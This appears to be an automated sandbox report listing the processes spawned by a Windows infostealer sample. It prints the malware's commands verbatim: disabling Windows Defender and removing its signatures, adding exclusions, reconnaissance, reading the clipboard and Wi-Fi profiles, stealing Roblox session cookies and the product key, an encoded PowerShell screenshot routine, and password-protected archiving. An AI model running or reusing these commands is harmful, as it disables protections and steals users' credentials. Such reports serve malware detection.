              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Users\user\Desktop\X9g8L63QGs.exe "C:\Users\user\Desktop\X9g8L63QGs.exe"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAH